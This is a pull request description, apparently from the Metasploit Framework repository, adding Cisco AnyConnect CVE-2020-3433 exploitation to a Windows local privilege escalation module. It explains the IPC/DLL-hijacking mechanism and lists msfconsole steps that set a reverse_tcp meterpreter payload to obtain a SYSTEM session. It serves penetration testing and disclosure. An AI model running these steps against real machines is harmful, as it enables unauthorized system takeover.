rapid7/metasploit-framework
# Added CVE-2020-3433 module

Hi,

This PR changes modules/exploit/windows/local/anyconnect_path_traversal_lpe module that exploits CVE-2020-3153 (msf module by @cdelafuente-r7) to add the possibility to exploit another local privilege escalation that I found in Cisco AnyConnect for Windows: CVE-2020-3433.

By default, this module will exploit CVE-2020-3433 (more versions vulnerable) but you can set an option to exploit CVE-2020-3153 (if vulnerable).

Cisco's advisory: [link](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW)

My PoC and technical details for CVE-2020-3433 (+ CVE-2020-3434 & CVE-2020-3435) are on my GitHub: [link](https://github.com/goichot/CVE-2020-3433) (in particular, you can check the [Details.md](https://github.com/goichot/CVE-2020-3433/blob/master/Details.md) file).

Antoine

## Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.

Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.

The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).

AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.

## Verification Steps

  1. Start msfconsole
  2. Get a session with non-administrative privileges
  3. Do: ```use exploit/windows/local/anyconnect_lpe```
  4. Do: ```set SESSION <SESSION>```
  5. Do: ```set payload windows/meterpreter/reverse_tcp```
  6. Do: ```set LHOST <LHOST>```
  7. Do: ```set LPORT <LPORT>```
  8. Do: ```check```
  9. Do: ```run```
  10. You should get a new session as the SYSTEM user

## Options
### INSTALL_PATH
  Set Cisco AnyConnect Secure Mobility Client installation path (where
  `vpndownloader.exe`should be found). It will be automatically detectedif not set.

### CVE
  Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.

### ForceExploit

  Set this to `true` to override the `check` result during exploitation.
